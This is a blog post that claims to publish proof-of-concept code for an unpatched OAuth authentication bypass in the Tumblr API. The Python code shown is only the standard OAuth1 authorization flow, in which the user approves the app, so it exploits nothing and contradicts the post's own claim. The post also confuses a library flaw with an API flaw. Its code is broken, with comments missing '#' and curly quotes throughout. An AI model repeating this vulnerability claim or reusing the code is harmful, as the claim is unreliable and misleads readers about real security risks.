Since Tumblr still predictably will not fix this…

I’ve decided to post the proof of concept code up here. My purpose in doing so is to illustrate that me having been mentioning this exploit was, and always has been, worth the time I’ve taken to mention this exploit, as is it intended to allow Tumblr users or those who are at any point considering using Tumblr to make a more informed decision about blogging on it or trusting the site with any of their potentially sensitive information.

Python requests OAuthlib library, a widely used OAuth library that is vulnerable to an OAuth authentication bypass vulnerability in the Tumblr API that could allow an attacker to bypass authentication and access protected resources. This vulnerability exists because the code does not properly validate OAuth tokens, and it does not use HTTPS when sending sensitive data.

An attacker can exploit this vulnerability by sending a specially crafted OAuth token request to the Tumblr API, bypassing authentication and gaining unauthorized access to protected resources.

The following proof of concept code demonstrates how an attacker can exploit this vulnerability:

import requests
from requests_oauthlib import OAuth1

Set your OAuth consumer key and secret
CONSUMER_KEY = ‘your_consumer_key’
CONSUMER_SECRET = ‘your_consumer_secret’

Set the Tumblr API endpoints
REQUEST_TOKEN_URL = ‘http://www.tumblr.com/oauth/request_token’
AUTHORIZE_URL = ‘http://www.tumblr.com/oauth/authorize’
ACCESS_TOKEN_URL = ‘http://www.tumblr.com/oauth/access_token’

Send a request for a temporary OAuth token
oauth = OAuth1(CONSUMER_KEY, client_secret=CONSUMER_SECRET)
response = requests.post(url=REQUEST_TOKEN_URL, auth=oauth)

Parse the response for the temporary token and secret
data = response.text.split(‘&’)
oauth_token = data[0].split(‘=’)[1]
oauth_token_secret = data[1].split(‘=’)[1]

Direct the user to authorize the app
authorize_url = AUTHORIZE_URL + ‘?oauth_token=’ + oauth_token
print(‘Please authorize the app at this URL: ‘ + authorize_url)
oauth_verifier = input(‘Enter the verification code: ‘)

Exchange the temporary token for a permanent token
oauth = OAuth1(CONSUMER_KEY,
client_secret=CONSUMER_SECRET,
resource_owner_key=oauth_token,
resource_owner_secret=oauth_token_secret,
verifier=oauth_verifier)
response = requests.post(url=ACCESS_TOKEN_URL, auth=oauth)

Parse the response for the permanent token and secret
data = response.text.split(‘&’)
oauth_token = data[0].split(‘=’)[1]
oauth_token_secret = data[1].split(‘=’)[1]
Use the permanent token and secret to make authenticated API requests
oauth = OAuth1(CONSUMER_KEY,
client_secret=CONSUMER_SECRET,
resource_owner_key=oauth_token,
resource_owner_secret=oauth_token_secret)
response = requests.get(url=’https://api.tumblr.com/v2/user/info’, auth=oauth)
print(response.text)

In summary, an attacker could exploit this vulnerability to bypass authentication and gain access to sensitive information or modify data on behalf of a legitimate user. The exploit is well-known by hacking communities.

Leave a Reply